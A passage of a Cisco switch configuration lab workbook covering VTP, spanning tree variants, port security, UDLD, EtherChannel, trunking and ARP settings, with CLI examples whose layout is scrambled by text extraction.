:
:
:
:
20
0
0
11
0
0
0
0
0
VTP pruning statistics:

Trunk
Join Transmitted Join Received
Summary advts received from

non-pruning-capable device
---------------- ---------------- ---------------- ---------------------------
Note
With VTP, a trunk port must be defined so that advertisements can be sent.
The default details are:
VTP name = Null
VTP mode = Server
VTP version = 2
VTP password = None
VTP pruning = Disabled

Area: Switches VTP Client Extended Client
Outline
delete VLANs.
Objectives
Define VTP transparent mode.

# config t
NetworkSims.com
189
# sh vtp status
Example
> enable
# config t
(config)# vtp ?
domain
file
address.
mode
password
pruning
version
(config)# vt m
client
server
transparent
?

Area: Switches IEEE 802.1Q/Layer 2 tunnelling
Outline
This challenge involves the configuring of 802.1Q tunnelling on a switch port.
Objectives
Define 802.1Q tunneling.

Define tagging of the VLAN ID.

> enable
# config t
(config-vlan)# exit
(config)# int fa0/1
(config-if)# switchport mode dot1q-tunnel
(config-if)# exit
(config)# vlan dot1q tag native
Example
> enable
# config t
NetworkSims.com
190

(config-vlan)# exit
(config)# int fa0/1
dynamic
(config-if)# switchport mode
access
Set trunking
dot1q-tunnel Set trunking
dynamic
Set trunking
trunk
Set trunking
?
mode
mode
mode
mode
to
to
to
to
ACCESS unconditionally
DOT1Q TUNNEL unconditionally
dynamically negotiate access or trunk mode
TRUNK unconditionally
(config-if)# switchport mode dot1q-tunnel ?

<cr>
(config-if)# switchport mode dot1q-tunnel
(config-if)# exit
(config)# vlan ?
WORD
ISL VLAN IDs 1-4094
dot1q
dot1q parameters
filter
Apply a VLAN Map
internal
internal VLAN
(config)# vlan dot1q ?
tag tag parameters
(config)# vlan dot1q tag ?
native tag native vlan
(config)# vlan dot1q tag native ?
<cr>
(config)# vlan dot1q tag native

Area: Switches IEEE 802.1Q/Layer 2 tunnelling
Outline
This challenge involves the configuring Layer 2 protocol tunneling.
Objectives
Define Layer 2 protocols to tunnel
NetworkSims.com
191
> enable
# config t
(config)# int fa0/1
(config-if)# l2protocol-tunnel cdp
(config-if)# l2protocol-tunnel stp
(config-if)# l2protocol-tunnel shutdown-threshold 100
(config-if)# exit
(config)# l2protocol-tunnel cos 5
Example
> enable
# config t
(config)# int fa0/1
(config-if)# l2protocol-tunnel ?
cdp
drop-threshold
Set drop threshold for protocol packets
point-to-point
point-to-point L2 Protocol
shutdown-threshold Set shutdown threshold for protocol packets
stp
Spanning Tree Protocol
vtp
Vlan Trunking Protocol
<cr>
(config-if)# l2protocol-tunnel cdp
(config-if)# l2protocol-tunnel stp
(config-if)# l2protocol-tunnel shutdown-threshold ?
<1-4096>
Packets/sec rate beyond which interface is put to err-disable
cdp
point-to-point point-to-point L2 Protocol
stp
Spanning Tree Protocol
vtp
Vlan Trunking Protocol
(config-if)# l2protocol-tunnel shutdown-threshold 100
(config)# l2protocol-tunnel ?
cos Class of Service
(config)# l2protocol-tunnel cos ?
<0-7> priority value
(config)# l2protocol-tunnel cos 5

Unit 2: VLAN and VTP

Outline
NetworkSims.com
192
This challenge involves the configuration of spanning-tree options.
Objectives
Setup VLANs.
Define spanning-tree settings.
Example
> en
# vlan database
VLAN 2 added:
Name: amsterdam
(vlan)# exit
APPLY completed.
Exiting....
# config t
(config-if)# exit
(config)# spanning-tree ?
backbonefast Enable BackboneFast Feature
etherchannel Spanning tree etherchannel specific configuration
extend
Spanning Tree 802.1t extensions
loopguard
Spanning tree loopguard options
mode
Spanning tree operating mode
pathcost
Spanning tree pathcost options
portfast
Spanning tree portfast options
uplinkfast
Enable UplinkFast Feature
vlan
(config)# spanning-tree vlan ?
WORD vlan range, example: 1,3-5,7,9-11
(config)# spanning-tree vlan 2
forward-time Set the forward delay for the spanning tree
hello-time
Set the hello interval for the spanning tree
max-age
Set the max age interval for the spanning tree
priority
Set the bridge priority for the spanning tree
root
Configure switch as root
<cr>
(config)# spanning-tree vlan 2 root ?
primary
Configure this switch as primary root for this spanning tree
secondary Configure switch as secondary root
(config)# spanning-tree vlan 2 root primary
(config)# int fa0/1
(config)# int fa0/2
NetworkSims.com
193

(config)# int fa0/3

Outline
This challenge involves enabling port security and the BPDU guard (to defined against
spanning-tree attacks).
Objectives
Enable BPDU guard.

Enable port-security.
Define a maximum number of MAC addresses on a port.
Define a MAC address on a port.
Example
> en
# config t
Switch(config)#
backbonefast
etherchannel
extend
loopguard
mode
mst
pathcost
portfast
uplinkfast
vlan
spanning-tree ?
Enable BackboneFast Feature
Spanning tree etherchannel specific configuration
Multiple spanning tree configuration
Switch(config)# spanning-tree
bpdufilter Enable portfast
bpduguard
Enable portfast
default
Enable portfast
portfast ?
bdpu filter on this switch
bpdu guard on this switch
by default on all access ports
Switch(config)# spanning-tree portfast bpduguard ?

default Enable bdpu guard by default on all portfast ports
Switch(config)# spanning-tree portfast bpduguard def ?
<cr>
Switch(config)# spanning-tree portfast bpduguard def
Switch(config)# int fa0/1
Switch(config-if)# sw po ?
NetworkSims.com
194
aging
Port-security aging commands
mac-address Secure mac address
maximum
Max secure addrs
violation
Security Violation Mode
<cr>
Switch(config-if)# switchport mode access
Switch(config-if)# switchport port-security
Switch(config-if)# switchport port-security max ?
<1-5120> Maximum addresses
Switch(config-if)# switchport port-security maximum 5
Switch(config-if)# switchport port-security mac-address ?
H.H.H
48 bit mac address
sticky Configure dynamic secure addresses as sticky
Switch(config-if)# switchport port-security mac-address 0000.1111.2222

Outline
This challenge involves the setting up UDLD (Unidirectional Link Detection) which
monitors the condition of a link, and identifies if it detects a unidectional link, on which it
can shut down the link, and display a message.
Objectives
Enable UDLD.
Apply it on an interface.
Example
> enable
# config t
(config)# udld ?
aggressive Enable UDLD protocol in aggressive mode on fiber ports except
where locally configured
enable
Enable UDLD protocol on fiber ports except where locally
configured
message
Set UDLD message parameters
(config)# udld enable
(config)# int fa0/1
(config-if)# udld ?
port Enable UDLD protocol on this interface
(config-if)# udld port ?
aggressive Enable UDLD protocol in aggressive mode on this interface
<cr>
NetworkSims.com
195
(config-if)# udld port

(config-if)# exit
(config)# exit
# sh udld
Interface Fa0/1
--Port enable administrative configuration setting: Enabled
Port enable operational state: Enabled
Current bidirectional state: Unknown
Current operational state: Link down
Message interval: 7
Time out interval: 5
No neighbor cache information stored
Interface Fa0/2
--Port enable administrative configuration setting: Disabled
Port enable operational state: Disabled
Interface Fa0/3
Interface Fa0/4
Interface Fa0/5
Interface Fa0/6
Interface Fa0/7
Interface Fa0/8
Interface Fa0/9
NetworkSims.com
196
Interface Fa0/10
Interface Fa0/11
Interface Fa0/12
Interface Fa0/13
Interface Fa0/14
Interface Fa0/15
Interface Fa0/16
Interface Fa0/17
Interface Fa0/18
Interface Fa0/19
Interface Fa0/20
NetworkSims.com
197

Interface Fa0/21
Interface Fa0/22
Interface Fa0/23

Outline
This challenge involves the setting up UDLD (Unidirectional Link Detection) which
monitors the condition of a link, and identifies if it detects a unidectional link, on which it
can shut down the link, and display a message.
Objectives
Enable UDLD.
Apply it on an interface.
Example
> enable
# config t
(config)# rm ?
alarm Configure an rmon alarm
event Configure an RMON event
(config)# rm a ?
<1-65535> alarm number
(config)# rmon a 10 ?
WORD MIB object to monitor
(config)# rmon a 10 ifEntry.20.1 ?
<1-2147483647> Sample interval
(config)# rmon a 10 ifEntry.20.1 20 ?
NetworkSims.com
198
absolute
delta
Test each sample directly

Test delta between samples
(config)# rmon a 10 ifEntry.20.1 20 de ?

rising-threshold Configure the rising threshold
(config)# rmon a 10 ifEntry.20.1 20 de ris ?
<-2147483648 - 2147483647> rising threshold value
(config)# rmon a 10 ifEntry.20.1 20 de ris ANY ?
<1-65535>
Event to fire on rising threshold crossing
falling-threshold Configure the falling threshold
(config)# rmon a 10 ifEntry.20.1 20 de ris ANY fal ?
<-2147483648 - 2147483647> falling threshold value
(config)# rmon a 10 ifEntry.20.1 20 de ris ANY fal 0 ?
<1-65535> Event to fire on falling threshold crossing
owner
Specify an owner for the alarm
<cr>
(config)# rmon a 10 ifEntry.20.1 20 de ris ANY fal ANY own ?
WORD Alarm owner
(config)# rmon a 10 ifEntry.20.1 20 de ris ANY fal ANY own ANY ?
<cr>
(config)# rmon alarm 10 ifEntry.20.1 20 delta rising-threshold 15 1 fallingthreshold 0 owner jjohnson

Area: Switches STP (Spanning Tree Protocol)
Outline
This challenge involves disabling spanning-tree on a VLAN.
Objectives
Disable spanning-tree on a specific VLAN.

> enable
# config t
(config)# no spanning-tree vlan 1
Example
> enable
NetworkSims.com
199
# config t
(config)# no spanning-tree ?
extend
loopguard
mode
mst
pathcost
portfast
uplinkfast
vlan
(config)# no spanning-tree vlan ?
(config)# no spanning-tree vlan 1 ?
hello-time
max-age
priority
root
<cr>
(config)# no spanning-tree vlan 1

Outline
This challenge involves defining a primary root switch.
Objectives
Define a primary root switch.

> enable
# config t
Example
> enable
# config t
NetworkSims.com
200

extend
loopguard
mode
mst
pathcost
portfast
uplinkfast
vlan
primary
(config)# spanning-tree vlan 1 root p ?
diameter Network diameter of this spanning tree
<cr>
(config)# spanning-tree v 1 r p ?

Outline
This challenge involves defining a secondary root switch which will take over from the
primary root switch if it fails.
Objectives
Define a secondary root switch.

> enable
# config t
(config)# spanning-tree vlan 1 root secondary
Example
> enable
# config t
extend
NetworkSims.com
201
loopguard
mode
mst
pathcost
portfast
uplinkfast
vlan
primary
(config)# spanning-tree vlan 1 root secondary ?
diameter Network diameter of this spanning tree
<cr>
(config)# spanning-tree vlan 1 root secondary

Outline
This challenge involves defining port-priority and path cost for spanning-tree.
Objectives
Define port-priority for spanning-tree.

Define path cost for spanning-tree.

> enable
# config t
(config-if)#
(config-if)#
(config-if)#
(config-if)#
spanning-tree
spanning-tree
spanning-tree
spanning-tree
cost 100
vlan 1 cost 100
vlan 1 port-priority 100
port-priority 100
Example
> enable
# config t
(config)# int fa0/1
Switch(config-if)# spanning-tree ?
bpdufilter
bpduguard
cost
NetworkSims.com
202
guard
link-type
mst
Multiple spanning tree
portfast
stack-port
Enable stack port
vlan
(config-if)# spanning-tree v 1 ?
cost
Change an interface's per VLAN spanning tree path cost
(config-if)# spanning-tree vlan 1 cost ?
<1-200000000> Change an interface's per VLAN spanning tree path cost
(config-if)# spanning-tree vlan 1 cost 100
(config-if)# spanning-tree port- ?
<0-240> port priority in increments of 16
(config-if)# spanning-tree port-priority 100
(config-if)# spanning-tree vlan 1 p ?
(config-if)# spanning-tree vlan 1 port-priority 100

Outline
This challenge involves defining port-priority and path cost for spanning-tree, and hellotime and forward-time.
Objectives
Define port-priority for spanning-tree.

Define path cost for spanning-tree.
Define spanning-tree hello-time.
Define spanning-tree forward-time.

> enable
# config t
(config)# spanning-tree vlan 1 forward-time 10
(config)# spanning-tree vlan 1 hello-time 10
(config)# spanning-tree vlan 1 max-age 10
NetworkSims.com
203
(config)# int fa0/1

(config-if)# spanning-tree
cost 100
vlan 1 cost 100
vlan 1 port-priority 100
port-priority 100
Example
> enable
# config t
(config)# spanning-tree vlan ANY ?
hello-time
max-age
priority
root
<cr>
(config)# spanning-tree vlan 1 forward-time ?
<4-30> number of seconds for the forward delay timer
(config)# spanning-tree vlan 1 forward-time 10
(config)# spanning-tree vlan 1 hello-time ?
<1-10> number of seconds between generation of config BPDUs
(config)# spanning-tree vlan 1 hello-time 10
(config)# spanning-tree vlan 1 m ?
<6-40> maximum number of seconds the information in a BPDU is valid
(config)# spanning-tree vlan 1 max-age 10
(config)# int fa0/1
Switch(config-if)# spanning-tree ?
bpdufilter
bpduguard
cost
guard
link-type
mst
portfast
stack-port
Enable stack port
vlan
(config-if)# spanning-tree v 1 ?
cost
(config-if)# spanning-tree port- ?
(config-if)# spanning-tree port-priority 100
NetworkSims.com
204
(config-if)# spanning-tree vlan 1 p ?

Cisco Switch Challenge 46 (MSTP/RSTP)

Area: Switches - RSTP and MSTP
Outline
This challenge involves configuring MSTP and RSTP. RSTP (Rapid Spanning Tree Protocol
IEEE 802.1W) and MSTP (Multiple STP IEEE 802.1S) are used to provide rapid
convergence of the spanning-tree protocol. RSTP is the part that allows for rapid
convergance and MSTP is used to group VLANs into a single spanning-tree instance. RSTP
can converge the spanning-tree instance in less than a second, as apposed to almost 50
seconds for standard 802.1D spanning tree). This type of setup is important in real-time
applications such as voice and video traffic.
Objectives
Define MST details.

Enable MSTP and RSTP for rapid convergence of the spanning-tree.

> enable
# config t
(config)# spanning-tree mst configuration
(config-mst)# instance 1 v 1
(config-mst)# name fred
(config-mst)# revision 1
(config-mst)# exit
(config)# spanning-tree mode mst
Example
> enable
# config t
extend
loopguard
mode
mst
pathcost
portfast
NetworkSims.com
205
uplinkfast
vlan
(config)# spanning-tree mst ?
WORD
MST instance range, example: 0-3,5,7-9
configuration Enter MST configuration submode
forward-time
Set the forward delay for the spanning tree
hello-time
max-age
max-hops
Set the max hops value for the spanning tree
(config)# spanning-tree mst configuration ?
<cr>
(config)# spanning-tree mst configuration
(config-mst)# ?
abort
exit
instance
name
no
private-vlan
revision
show
Exit region configuration mode, aborting changes

Exit region configuration mode, applying changes
Map vlans to an MST instance
Set configuration name
Set private-vlan synchronization
Set configuration revision number
Display region configurations
(config-mst)# instance ?
<0-15> MST instance id
(config-mst)# instance 1 ?
vlan Range of vlans to add to the instance mapping
(config-mst)# instance 1 vlan ?
LINE vlan range ex: 1-65, 72, 300 -200
(config-mst)# instance 1 vlan 1
(config-mst)# name ?
WORD Configuration name
(config-mst)# name fred
(config-mst)# revision ?
<0-65535> Configuration revision number
(config-mst)# revision 1
(config-mst)# exit
(config)# spanning-tree mode ?
mst
Multiple spanning tree mode
pvst
Per-Vlan spanning tree mode
rapid-pvst Per-Vlan rapid spanning tree mode
Notes
The command:
enables both MSTP and RSTP. All the switches in the MST region require the same
configuration for their MST settings.
NetworkSims.com
206
The default parameters for RSTP and MSTP are:

Spanning-tree mode: PVST (MSTP and RSTP disabled)
Switch priority
32768
Spanning tree priority:
128
Spanning-tree cost:
4 (1Gbps), 19 (100Mbps), 100 (10Mbps)
Hello time:
2 seconds
Forward-delay time:
15 seconds
Maximum-aging time:
20 seconds
Maximum hop count: 20 hops
Cisco Switch Challenge 47 (Primary root

switch)
Outline
This challenge involves configuring a primary root switch for a given instance.
Objectives
Define a primary root.

Define MST parameters on the interface, such as cost and port-priority.
Define global MST parameters, such as hello time, forward-time, maximum age,
maximum hops and priority.

> enable
# config t
(config)# spanning-tree mst 1 root primary
(config)# spanning-tree mst hello-time 10
(config)# spanning-tree mst forward-time 10
(config)# spanning-tree mst 1 priority 10
(config)# spanning-tree mst max-age 10
(config)# spanning-tree mst max-hops 10
(config)# int fa0/1
(config-if)# spanning-tree mst 1 cost 10
(config-if)# spanning-tree mst 1 port-priority 10
Example
NetworkSims.com
207
> enable
# config t
WORD
forward-time
hello-time
max-age
max-hops
(config)# spanning-tree mst 1 ?
priority Set the bridge priority for the spanning tree
root
(config)# spanning-tree mst 1 root ?
primary
(config)# spanning-tree mst hello-time ?
(config)# spanning-tree mst forward-time ?
root
(config)# spanning-tree mst 1 priority ?
<0-61440> bridge priority in increments of 4096
(config)# spanning-tree mst max-age ?
<6-40> maximum number of seconds the information in a BPDU is valid
(config)#
<1-40>
(config)#
(config)#
spanning-tree mst
maximum number of
spanning-tree mst
spanning-tree mst
max-hops ?
hops a BPDU is valid
max-age 10
max-hops 10
(config)# int fa0/1

(config-if)# spanning-tree mst ?
WORD MST instance list, example 0,2-4,6,8-12
(config-if)# spanning-tree mst 1 ?
cost
Change the interface spanning tree path cost for an instance
port-priority Change the spanning tree port priority for an instance
(config-if)# spanning-tree mst 1 cost ?
<1-200000000> Change the interface spanning tree path cost for an instance
(config-if)# spanning-tree mst 1 port-priority ?
Cisco Switch Challenge 48 (Secondary root

switch)
Outline
NetworkSims.com
208
This challenge involves configuring a secondary root switch for a given instance.
Objectives
Define a secondary root.


> enable
# config t
(config)# spanning-tree mst 1 root secondary
(config)# int fa0/1
Example
> enable
# config t
WORD
forward-time
hello-time
max-age
max-hops
root
(config)# spanning-tree mst 1 root ?
primary
(config)# spanning-tree mst 1 root secondary
(config)# spanning-tree mst hello-time ?
(config)# spanning-tree mst forward-time ?
root
(config)# spanning-tree mst 1 priority ?
<0-61440> bridge priority in increments of 4096
(config)# spanning-tree mst max-age ?
NetworkSims.com
209
<6-40>
(config)#
<1-40>
(config)#
(config)#
maximum number of seconds the information in a BPDU is valid

spanning-tree mst
maximum number of
spanning-tree mst
spanning-tree mst
max-hops ?
hops a BPDU is valid
max-age 10
max-hops 10
(config)# int fa0/1

(config-if)# spanning-tree mst ?
WORD MST instance list, example 0,2-4,6,8-12
(config-if)# spanning-tree mst 1 ?
cost
Change the interface spanning tree path cost for an instance
port-priority Change the spanning tree port priority for an instance
(config-if)# spanning-tree mst 1 cost ?
<1-200000000> Change the interface spanning tree path cost for an instance
(config-if)# spanning-tree mst 1 port-priority ?

Area: Switches Load Sharing with STP port-priorities
Outline
It is possible to create more than one trunk routes, and share traffic between them.
Unfortunately loops can occur so STP is used to avoid these. In this case port-priorities are
defined for each VLAN, so that specific VLANs take one of the trunk routes.
Objectives
Define VTP details.

Define trunk ports (two, in this case).
Define port-priority for the trunk ports.

> enable
# config t
(config)# int fa0/6
(config-if)# exit
(config)# int fa0/10
NetworkSims.com
210
(config-if)#
(config-if)#
(config-if)#
(config-if)#
(config-if)#
spanning-tree vlan 13 port-priority 10

switchport trunk encapsulation dot1q
switchport mode trunk
Example
> enable
# config t
(config)# vtp ?
domain
file
address.
mode
password
pruning
version
(config)# vtp mode ?
client
server
(config)# int fa0/6
bpdufilter
bpduguard
cost
guard
link-type
mst
portfast
stack-port
Enable stack port
vlan
(config-if)# spanning-tree vlan ?
(config-if)# spanning-tree vlan 10 ?
cost
(config-if)# spanning-tree vlan 10 port-priority ?
(config-if)#
(config-if)#
(config-if)#
(config-if)#
(config-if)#
(config-if)#

exit
NetworkSims.com
211
(config-if)#
(config-if)#
(config-if)#
(config-if)#
(config-if)#

Note the default port-priority is 128. Thus in this example the port priorities for the first
trunk will be:
VLAN 10 10
VLAN 11 10
VLAN 12 10
VLAN 13 128
VLAN 14 128
VLAN 15 128
And for the second trunk:
VLAN 10 128
VLAN 11 128
VLAN 12 128
VLAN 13 10
VLAN 14 10
VLAN 15 10
Thus the lower priority will be taken, so VLAN 10, 11 and 12 will go through Trunk 1, and
VALN 13, 14 and 15 will go through Trunk 2. If either of the trunks fail, the traffic which
would normally go through the failed trunk will use the other trunk. In this way there is a
fail-back solution, along with load balancing.

Area: Switches Load Sharing with STP costs.
Outline
It is possible to create more than one trunk routes, and share traffic between them.
Unfortunately loops can occur so STP is used to avoid these. In this case cost vlans are
defined for each VLAN, so that specific VLANs take one of the trunk routes.
Objectives
NetworkSims.com
212
Define VTP details.

Define trunk ports (two, in this case).
Define cost values for the trunk ports.

> enable
# config t
(config)# int fa0/6
(config-if)# exit
Example
> enable
# config t
(config)# int fa0/6
(config-if)# exit
Note the default cost is 19. Thus in this example the cost for the first trunk will be:
VLAN 10 10
VLAN 11 10
VLAN 12 10
VLAN 13 19
VLAN 14 19
NetworkSims.com
213
VLAN 15 19
And for the second trunk:
VLAN 10 19
VLAN 11 19
VLAN 12 19
VLAN 13 10
VLAN 14 10
VLAN 15 10
Thus the lower cost will be taken, so VLAN 10, 11 and 12 will go through Trunk 1, and
VALN 13, 14 and 15 will go through Trunk 2. If either of the trunks fails, the traffic which
would normally go through the failed trunk will use the other trunk. In this way there is a
fail-back solution, along with load balancing.

Outline
This challenge involves the configuration of MST.
Objectives
Define MST.
Example
Switch(config)#spanning-tree mst ?
WORD
forward-time
hello-time
max-age
max-hops
Switch(config)#spanning-tree mst configuration
Switch(config-mst)#?
abort
Exit region configuration mode, aborting changes
exit
Exit region configuration mode, applying changes
instance
Map vlans to an MST instance
NetworkSims.com
214
name
no
private-vlan
revision
show
Set configuration name

Set private-vlan synchronization
Set configuration revision number
Display region configurations
Switch(config-mst)#instance ?
<0-15> MST instance id
Switch(config-mst)#instance 1 ?
vlan Range of vlans to add to the instance mapping
Switch(config-mst)#instance 1 vlan ?
LINE vlan range ex: 1-65, 72, 300 -200
Switch(config-mst)#instance 1 vlan 10
Switch(config-mst)#name ?
WORD Configuration name
Switch(config-mst)#name region1
Switch(config-mst)#revision ?
<0-65535> Configuration revision number
Switch(config-mst)#revision 1
Switch(config-mst)#show pending
Pending MST configuration
Name
[region1]
Revision 1
Instance Vlans mapped
-------- --------------------------------------------------------------------0
1-9,11-4094
1
10
------------------------------------------------------------------------------Switch(config-mst)#
Cisco Switch Challenge 52 (Primary root

switch)
Outline
This challenge involves configuring a primary root switch for a given instance, with a pointto-point link for rapid transistions.
Objectives
NetworkSims.com
215
Define a primary root.

Define a point-to-point link for rapid transistions.

> enable
# config t
(config)# int fa0/1
(config-if)# spanning-tree link-type point-to-point
Example
> enable
# config t
(config)# int fa0/1
bpdufilter
bpduguard
cost
guard
link-type
mst
portfast
stack-port
Enable stack port
vlan
(config-if)# spanning-tree link-type ?
point-to-point Consider the interface as point-to-point
shared
Consider the interface as shared
(config-if)# spanning-tree link-type point-to-point

Outline
NetworkSims.com
216
This challenge involves the configuration of a Etherchannel.

Objectives
Define Etherchannel on ports.
Example
# config t
(config)# int fa0/1
(config-if)# channel-group ?
<1-64> Channel group number
(config-if)# channel-g 3 ?
mode Etherchannel Mode of the interface
(config-if)# channel-g 3 m ?
active
Enable LACP unconditionally
auto
Enable PAgP only if a PAgP device
desirable Enable PAgP unconditionally
on
Enable Etherchannel only
passive
Enable LACP only if a LACP device
(config-if)# channel-group 3 mode ?
active
auto
Enable PAgP only if a PAgP device
desirable Enable PAgP unconditionally
on
passive
Enable LACP only if a LACP device
(config-if)# channel-group 3 mode on
is detected
is detected
is detected
is detected

Outline
This challenge involves configuring LACP (Link Aggregation Control Protocol - IEEE
802.3ad). The LACP packets use EtherChannels to intercommunicate, where the neighours
and and port group capabilities are leart and compared with local switch capabilities. In
LACP there are roles assigned to the EtherChannel endpoints. Thus the switch with the
lowest system priority is then elected to make decisions about what ports are actively
participating in the EtherChannel.
Objectives
Configure for LACP (Link Aggregation Control Protocol).
NetworkSims.com
217
(config)# lacp system-priority 2

(config)# interface fa0/1
(config-if)# channel-protocol lacp
(config-if)# lacp port-priority 1
Example
(config)# lacp ?
system-priority
LACP priority for the system
(config)# lacp system-priority ?

<1-65535> Priority value
(config)# lacp system-priority 2
(config)# interface fa0/1
(config-if)# channel-protocol ?
lacp Prepare interface for LACP protocol
pagp Prepare interface for PAgP protocol
(config-if)# channel-protocol lacp
(config-if)# channel-group ?
<1-6> Channel group number
(config-if)# channel-group 1 ?
mode Etherchannel Mode of the interface
(config-if)#
active
auto
desirable
on
passive
channel-group 1 mode ?
Enable PAgP only if a PAgP device is detected
Enable PAgP unconditionally
Enable LACP only if a LACP device is detected
(config-if)# channel-group 1 mode active

(config-if)# lacp ?
port-priority LACP priority on this interface
(config-if)# lacp port-priority ?
(config-if)# lacp port-priority 1

Unit 3: STP

Area: Switches Defining trunk ports
NetworkSims.com
218
Outline
The Dot1q encapsulation protocol allows for a trunk connection to interconnect VLANs on
different switches.
Objectives
Define normal switch port.

Define a trunk port.

> enable
# config t
(config)# int fa0/1
(config-if)# exit
(config)# int fa0/2
(config-if)# exit
(config)# int fa0/3
(config-if)# exit
(config)# int fa0/4
(config-if)# exit
(config)# int fa0/6
(config-if)# switchport trunk mode dot1q
Example
> enable
# config t
(config)# int fa0/1
(config-if)# sw ?
access
block
broadcast
host
Set port host
mode
multicast
native
trunking mode
nonegotiate
interface
priority
NetworkSims.com
219
protected
pruning

mode
trunk
unicast
voice
<cr>
(config-if)# sw mo ?
access
Set trunking
dot1q-tunnel Set trunking
dynamic
Set trunking
trunk
Set trunking
(config-if)# switchport mode
(config-if)# exit
mode to
mode to
mode to
mode to
access
ACCESS unconditionally
DOT1Q TUNNEL unconditionally
dynamically negotiate access or trunk mode
TRUNK unconditionally
(config)# int fa0/2

(config-if)# exit
(config)# int fa0/3
(config-if)# exit
(config)# int fa0/4
(config-if)# exit
(config)# int fa0/6
(config-if)# sw t ?
allowed
mode
native
trunking mode
pruning
mode

Outline
different switches and define the VLAN to stop trunking on an interface.
Objectives
NetworkSims.com
220

Define a port to stop trunking for a given VLAN.

> enable
# config t
(config)# int fa0/1
(config-if)# exit
(config)# int fa0/2
(config-if)# exit
(config)# int fa0/3
(config-if)# exit
(config)# int fa0/4
(config-if)# exit
(config)# int fa0/6
(config-if)# switchport trunk native vlan 6
Example
> enable
# config t
(config)# int fa0/1
(config-if)# exit
(config)# int fa0/2
(config-if)# exit
(config)# int fa0/3
(config-if)# exit
(config)# int fa0/4
(config-if)# exit
(config)# int fa0/6
dynamic
NetworkSims.com
221
(config-if)# switchport trunk ?

allowed
mode
native
trunking mode
pruning
mode
(config-if)# switchport trunk native ?
vlan Set native VLAN when interface is in trunking mode
(config-if)# switchport trunk native vlan ?
<1-4094> VLAN ID of the native VLAN when this port is in trunking mode
In this example FA0/6 will stop trunking for VLAN 5, and the native VLAN is defined as
VLAN 6.

Outline
different switches and define the VLAN to stop trunking on an interface.
Objectives

Remove a VLAN from trunking.

> enable
# config t
(config)# int fa0/1
(config-if)# exit
(config)# int fa0/2
(config-if)# exit
(config)# int fa0/3
(config-if)# exit
NetworkSims.com
222
(config)# int fa0/4

(config-if)# exit
(config)# int fa0/6
(config-if)# switchport trunk allowed vlan remove 2
Example
> enable
# config t
(config)# int fa0/1
(config-if)# exit
(config)# int fa0/2
(config-if)# exit
(config)# int fa0/3
(config-if)# exit
(config)# int fa0/4
(config-if)# exit
(config)# int fa0/6
(config-if)# switchport t ?
allowed
mode
native
trunking mode
pruning
mode
(config-if)# switchport t a ?
vlan Set allowed VLANs when interface is in trunking mode
(config-if)# switchport t a v ?
WORD
VLAN IDs of the allowed VLANs when this port is in trunking mode
add
add VLANs to the current list
all
all VLANs
except all VLANs except the following
none
no VLANs
remove remove VLANs from the current list
(config-if)# switchport trunk allowed vlan remove ?
WORD VLAN IDs of disallowed VLANS when this port is in trunking mode
NetworkSims.com
223

Outline
different switches and define the VLAN to be removed from VLAN pruning.
Objectives

Remove a VLAN from pruning.

> enable
# config t
(config)# int fa0/1
(config-if)# exit
(config)# int fa0/2
(config-if)# exit
(config)# int fa0/3
(config-if)# exit
(config)# int fa0/4
(config-if)# exit
(config)# int fa0/6
(config-if)# switchport trunk pruning vlan remove 10
Example
> enable
# config t
(config)# int fa0/1
(config-if)# exit
(config)# int fa0/2
(config-if)# exit
NetworkSims.com
224
(config)# int fa0/3

(config-if)# exit
(config)# int fa0/4
(config-if)# exit
(config)# int fa0/6
(config-if)# switchport t ?
allowed
mode
native
trunking mode
pruning
mode
(config-if)# sw t p ?
vlan Set VLANs enabled for pruning when interface is in trunking mode
(config-if)# sw t p v ?
WORD
VLAN IDs of the allowed VLANs when this port is in trunking mode
add
add VLANs to the current list
except all VLANs except the following
none
no VLANs
remove remove VLANs from the current list
(config-if)# sw t p v r ?
WORD VLAN IDs of disallowed VLANS when this port is in trunking mode
(config-if)# switchport trunk pruning vlan remove 10

Unit 4: InterVLAN

Area: Switches IP Unicast Routing
Outline
This challenge involves configuring a port (FA0/1) for Layer 3 access.
NetworkSims.com
225
Objectives
Define Layer 3 access.

Define an IP address for FA0/1.
Define classless IP addresses.
Define zero-subnet.

> enable
# config t
(config)# int fa0/1
(config-if)# no switchport
(config-if)# exit
Example
> enable
# config t
# int fa0/1
A.B.C.D IP address
(config-if)# ip address 1.2.3.4 ?
(config-if)# exit
(config)# ip ?
Global IP configuration subcommands:
access-list
Named access-list
accounting-list
kept
accounting-threshold Sets the maximum number of accounting entries
accounting-transits
alias
as-path
BGP autonomous system path filter
bgp-community
format for BGP community
cef
Cisco Express Forwarding
classless
Follow classless routing forwarding rules
community-list
Add a community list entry
default-gateway
default-network
Flags networks as candidates for default routes
dhcp
Configure DHCP server, relay and snooping parameters
dhcp-server
domain-list
domain-lookup
domain-name
NetworkSims.com
226
dvmrp
extcommunity-list
finger
flow-aggregation
flow-cache
flow-export
forward-protocol
DVMRP global commands

Add a extended community list entry
finger server
Configure flow aggregation
Configure netflow cache parameters
Specify host/port to send flow statistics
Controls forwarding of physical and directed IP
broadcasts
ftp
gdp
Router discovery mechanism
gratuitous-arps
host
host-routing
hp-host
http
icmp
ICMP options
igmp
IGMP global configuration
local
mrm
Configure IP Multicast Routing Monitor test parameters
mroute
Configure static multicast routes
msdp
MSDP global commands
multicast
Global IP Multicast Commands
multicast-routing
Enable IP multicast forwarding
name-server
ospf
OSPF
pim
PIM global commands
prefix-list
Build a prefix list
radius
rcmd
Rcmd commands
reflexive-list
route
Establish static routes
routing
Enable IP routing
sap
Global IP Multicast SAP Commands
sdr
Global IP Multicast SDR Commands
security
source-route
sticky-arp
Allow the creation of sticky ARP entries
subnet-zero
tacacs
tcp
telnet
tftp
vrf
Configure an IP VPN Routing/Forwarding instance
wccp
Web-Cache Coordination Protocol Commands

Area: Switches IP Unicast Routing
Outline
This challenge involves configuring a static ARP cache, and other ARP details.
Objectives
NetworkSims.com
227
Define the default gateway (if routing is not enabled).

Define a static ARP value.
Define ARP timeout.

> enable
# config t
(config)# arp 1.2.3.4 1.1.1
(config)# int fa0/1
(config-if)# arp timeout 10
(config-if)# ip proxy-arp
(config-if)# arp arpa
Example
> enable
# config t
(config)# arp ?
A.B.C.D IP address of ARP entry
vrf
Configure static ARP for a VPN Routing/Forwarding instance
(config)# arp 1.2.3.4 ?
H.H.H 48-bit hardware address of ARP entry
(config)# arp 1.2.3.4 1.1.1 ?
arpa
ARP type ARPA
sap
ARP type SAP (HP's ARP type)
smds
ARP type SMDS
snap
ARP type SNAP (FDDI and TokenRing)
srp-a ARP type SRP (side A)
srp-b ARP type SRP (side B)
(config)# int fa0/1
(config-if)# arp ?
arpa
Standard arp protocol
